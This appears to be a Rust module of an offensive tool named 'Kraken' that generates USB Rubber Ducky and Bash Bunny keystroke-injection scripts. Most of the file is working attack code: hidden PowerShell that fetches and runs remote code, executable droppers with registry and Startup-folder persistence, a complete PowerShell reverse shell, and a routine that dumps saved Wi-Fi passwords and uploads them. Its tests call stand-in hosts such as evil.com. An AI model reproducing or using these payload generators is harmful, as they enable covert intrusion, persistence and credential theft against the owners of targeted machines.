use std::collections::HashMap;

#[derive(Debug, Clone, serde::Serialize, serde::Deserialize)]
pub struct UsbPayload {
    pub name: String,
    pub format: String,
    pub os_target: String,
    pub description: String,
    pub script: String,
    pub payload_type: String,
}

pub struct UsbDropper;

impl UsbDropper {
    pub fn new() -> Self {
        UsbDropper
    }

    pub fn generate_ducky_script(
        payload_type: &str,
        download_url: &str,
        exe_name: &str,
        persistence: bool,
    ) -> String {
        let mut script = String::new();
        script.push_str("REM USB Rubber Ducky Script - Generated by Kraken\n");
        script.push_str("DELAY 1000\n");
        script.push_str("GUI r\n");
        script.push_str("DELAY 500\n");

        match payload_type {
            "powershell" => {
                script.push_str(&format!("STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C \"IEX (New-Object Net.WebClient).DownloadString('{}')\"\n", download_url));
                script.push_str("ENTER\n");
                if persistence {
                    script.push_str("DELAY 2000\n");
                    script.push_str(&format!("STRING powershell -NoP -NonI -W Hidden -C \"$p='{}';$a=New-Object -ComObject WScript.Shell;$s=$a.CreateShortcut('$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\{}.lnk');$s.TargetPath='powershell.exe';$s.Arguments='-NoP -NonI -W Hidden -C IEX(New-Object Net.WebClient).DownloadString(\\\"'$p'\\\")';$s.Save()\"\n", download_url, exe_name));
                    script.push_str("ENTER\n");
                }
            }
            "exe" => {
                script.push_str(&format!("STRING powershell -NoP -NonI -W Hidden -C \"(New-Object Net.WebClient).DownloadFile('{}', '$env:TEMP\\{}'); Start-Process '$env:TEMP\\{}'\"\n", download_url, exe_name, exe_name));
                script.push_str("ENTER\n");
                if persistence {
                    script.push_str("DELAY 3000\n");
                    script.push_str(&format!("STRING reg add \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"{0}\" /t REG_SZ /d \"$env:TEMP\\{0}\" /f\n", exe_name));
                    script.push_str("ENTER\n");
                }
            }
            "reverse_shell" => {
                script.push_str("STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C \"$c=New-Object Net.Sockets.TCPClient('{{LHOST}}',{{LPORT}});$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String);$sb2=$sb + 'PS ' + (pwd).Path + '> ';$sbt=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length)}}\"\n");
                script.push_str("ENTER\n");
            }
            "wifi_steal" => {
                script.push_str("STRING cmd /k \"for /f \\\"skip=9 tokens=1,2 delims=:\\\" %i in ('netsh wlan show profiles') do @if not \\\"%j\\\"==\\\"\\\" netsh wlan show profile %j key=clear >> $env:TEMP\\wifi.txt\"\n");
                script.push_str("ENTER\n");
                script.push_str("DELAY 2000\n");
                script.push_str(&format!("STRING powershell -NoP -NonI -W Hidden -C \"(New-Object Net.WebClient).UploadFile('{}', '$env:TEMP\\wifi.txt')\"\n", download_url));
                script.push_str("ENTER\n");
            }
            _ => {
                script.push_str("STRING echo \"Unknown payload type\"\n");
                script.push_str("ENTER\n");
            }
        }

        script.push_str("DELAY 500\n");
        script.push_str("REM Done\n");
        script
    }

    pub fn generate_bash_bunny(payload_type: &str, download_url: &str, exe_name: &str) -> String {
        let mut script = String::new();
        script.push_str("#!/bin/bash\n");
        script.push_str("# Bash Bunny - Generated by Kraken\n");
        script.push_str("LED SETUP\n");
        script.push_str("ATTACKMODE HID STORAGE\n");
        script.push_str("LED ATTACK\n");

        match payload_type {
            "powershell" => {
                script.push_str(&format!("Q STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C \"IEX (New-Object Net.WebClient).DownloadString('{}')\"\n", download_url));
                script.push_str("Q ENTER\n");
            }
            "exe" => {
                script.push_str(&format!("Q STRING powershell -NoP -NonI -W Hidden -C \"(New-Object Net.WebClient).DownloadFile('{}', '$env:TEMP\\{}'); Start-Process '$env:TEMP\\{}'\"\n", download_url, exe_name, exe_name));
                script.push_str("Q ENTER\n");
            }
            _ => {
                script.push_str(&format!("Q STRING echo \"{}\"\n", payload_type));
                script.push_str("Q ENTER\n");
            }
        }

        script.push_str("LED FINISH\n");
        script
    }

    pub fn analyze_payload(script: &str) -> HashMap<String, usize> {
        let mut analysis = HashMap::new();
        analysis.insert("lines".to_string(), script.lines().count());
        analysis.insert("chars".to_string(), script.len());
        analysis.insert("enter_count".to_string(), script.matches("ENTER\n").count());
        analysis.insert("delay_count".to_string(), script.matches("DELAY").count());
        analysis.insert("powershell_refs".to_string(), script.matches("powershell").count());
        analysis.insert("download_refs".to_string(), script.matches("DownloadString").count() + script.matches("DownloadFile").count());
        analysis
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_generate_ducky_powershell() {
        let script = UsbDropper::generate_ducky_script("powershell", "http://evil.com/pay.ps1", "payload", false);
        assert!(script.contains("REM USB Rubber Ducky"));
        assert!(script.contains("powershell"));
        assert!(script.contains("IEX"));
    }

    #[test]
    fn test_generate_ducky_exe() {
        let script = UsbDropper::generate_ducky_script("exe", "http://evil.com/pay.exe", "malware.exe", true);
        assert!(script.contains("DownloadFile"));
        assert!(script.contains("Start-Process"));
        assert!(script.contains("Run"));
    }

    #[test]
    fn test_generate_ducky_reverse_shell() {
        let script = UsbDropper::generate_ducky_script("reverse_shell", "", "", false);
        assert!(script.contains("TCPClient"));
        assert!(script.contains("LHOST"));
    }

    #[test]
    fn test_generate_bash_bunny() {
        let script = UsbDropper::generate_bash_bunny("powershell", "http://evil.com/p.ps1", "p.ps1");
        assert!(script.contains("Bash Bunny"));
        assert!(script.contains("ATTACKMODE"));
    }

    #[test]
    fn test_analyze_payload() {
        let script = UsbDropper::generate_ducky_script("powershell", "http://evil.com/a.ps1", "a", false);
        let analysis = UsbDropper::analyze_payload(&script);
        assert!(analysis.contains_key("lines"));
        assert!(analysis.contains_key("powershell_refs"));
    }

    #[test]
    fn test_usb_payload() {
        let p = UsbPayload {
            name: "Steal WiFi".to_string(),
            format: "ducky".to_string(),
            os_target: "windows".to_string(),
            description: "Steals WiFi passwords".to_string(),
            script: "SCRIPT".to_string(),
            payload_type: "wifi_steal".to_string(),
        };
        let json = serde_json::to_string_pretty(&p).unwrap();
        assert!(json.contains("Steal WiFi"));
    }
}
